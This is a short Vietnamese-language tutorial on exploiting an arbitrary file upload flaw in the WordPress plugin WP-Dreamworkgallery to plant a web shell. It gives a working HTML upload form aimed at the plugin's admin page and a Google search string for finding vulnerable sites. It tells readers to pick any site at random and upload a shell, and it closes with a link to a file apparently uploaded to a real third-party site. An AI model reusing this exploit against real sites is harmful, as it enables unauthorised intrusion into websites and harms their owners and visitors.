Bảo Mật
Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery
Lỗi này cho phép chúng ta UpShell lên một cách thoải mái thông qua một file .html ngay từ localhost
Bước 1: Tạo 1 file Upload.html
<html> <body> <form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html>
Bước 2: Tìm Web bị lỗi
Tìm lỗi bằng cách vào Google.com gõ lệnh
inurl:/wp-content/plugins/wp-dreamworkgallery/
Bước 3: Chọn 1 site bất kỳ
Thay link trang Web bị lỗi vào code ở Bước 1, nhớ Save lại nhé
Bước 4: Up Shell
Mở File Upload.html ở Bước 1 lên, và Up Shell lên
Lưu ý: Đoạn lỗi sau khi Up shell
Copy dòng này vào Link site bị lỗi là OK
http://www.presprint.rs/wp-content/uploads/dreamwork/334_uploadfolder/big/1.html